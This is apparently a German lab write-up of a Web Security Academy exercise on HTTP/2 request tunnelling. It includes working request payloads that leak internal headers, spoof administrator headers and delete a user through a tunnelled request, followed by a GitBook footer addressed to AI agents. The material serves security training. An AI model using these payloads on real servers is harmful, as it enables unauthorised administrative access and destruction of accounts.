> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/request-smuggling/access-control-bypass-via-http2-tunneling.md).

# Umgehung der Zugriffskontrolle via HTTP/2-Tunneling

### Umgehung von Zugriffskontrollen über HTTP/2-Request-Tunnelling

#### **Beschreibung des Labs**

Dieses Lab ist anfällig für Request Smuggling, weil der Front-End-Server HTTP/2-Anfragen auf HTTP/1 herabstuft, während er eingehende Header-Namen falsch bereinigt. / Um das Lab zu lösen, müssen Sie auf das Admin-Panel zugreifen, das sich unter **/admin** als Administrator, dann Benutzer löschen **carlos**.

Der Front-End-Server verwendet die Verbindung mit dem internen Server nicht erneut, daher ist er nicht anfällig für die klassischen Request-Smuggling-Angriffe. Andererseits bleibt er weiterhin anfällig für die **HTTP/2-Tunnelling**.

#### **Untersuchung des Serververhaltens**

Fügen Sie zunächst einen benutzerdefinierten Header ein, zum Beispiel:

{% code title="Name:" %}

```http
Test: Testen
Host: jord4n.pro
Wert:
```

{% endcode %}

<pre class="language-http" data-title="Wert:"><code class="lang-http"><strong>Wert
</strong></code></pre>

<figure><img src="/files/16d0aa6c192bd85b12020903f43297cda85127dd" alt=""><figcaption></figcaption></figure>

Der Server gibt dann einen Fehler zurück, was darauf hinweist, dass der Header injizierbar ist.

<figure><img src="/files/932893e21a5e2534316a26d44dd63b78bcd5f839" alt=""><figcaption></figcaption></figure>

Wenn wir dann in die Suchmaschine etwas wie Folgendes eingeben:

{% code title="Name" %}

```http
Test: Testen
Content-Length: 100

search=testing
```

{% endcode %}

<figure><img src="/files/523834e8b954814dc90d95bc5821193b3025b82c" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/fde62f52c376e1b857de25cd047c69a9d502b2b2" alt="" width="316"><figcaption></figcaption></figure>

der Front-End-Server wird durch diesen zusätzlichen Header verwirrt. / Durch das Erhöhen des **Content-Length** auf etwa **150**, gibt der Server interne Header zurück:

```http
cookie: session=hGFEdnaCHTLJR2gv68Qj600nBECAmCeL
X-SSL-VERIFIED: 0
X-SSL-CLIENT-CN: null
X-FRONTEND-KEY: 7732064356452682
```

<figure><img src="/files/805deea7abf26364c23f8b8e8544f2830451cbe6" alt=""><figcaption></figcaption></figure>

#### **Erstellung der getunnelten Anfrage**

Nun wird eine neue Header-Sequenz eingeschleust:

```http
Test: Testen

GET /admin HTTP/1.1
Host: 0a4d00060452b3308271d30100b100ec.web-security-academy.net
X-SSL-VERIFIED: 1
X-SSL-CLIENT-CN: administrator
X-FRONTEND-KEY: 7732064356452682


```

Damit das Tunneling korrekt funktioniert, werden die richtige Methode (je nach Fall HEAD oder GET) und die gewünschte Route angegeben.

<figure><img src="/files/f0e8d9c5f3336bd7e168b32cbd2c672fc5e2896f" alt=""><figcaption></figcaption></figure>

Anschließend wird auf das Admin-Panel zugegriffen, wo Benutzer **wiener** und **carlos** erscheinen.

<figure><img src="/files/36889cd020f8c116580827c5ebe1f204910c6929" alt=""><figcaption></figcaption></figure>

#### **Löschen des Benutzers**

Das Löschen erfolgt durch das Senden einer ähnlichen getunnelten Anfrage:

```http
Test: Testen

GET /admin/delete?username=carlos HTTP/1.1
Host: 0a4d00060452b3308271d30100b100ec.web-security-academy.net
X-SSL-VERIFIED: 1
X-SSL-CLIENT-CN: administrator
X-FRONTEND-KEY: 7732064356452682


```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/request-smuggling/access-control-bypass-via-http2-tunneling.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
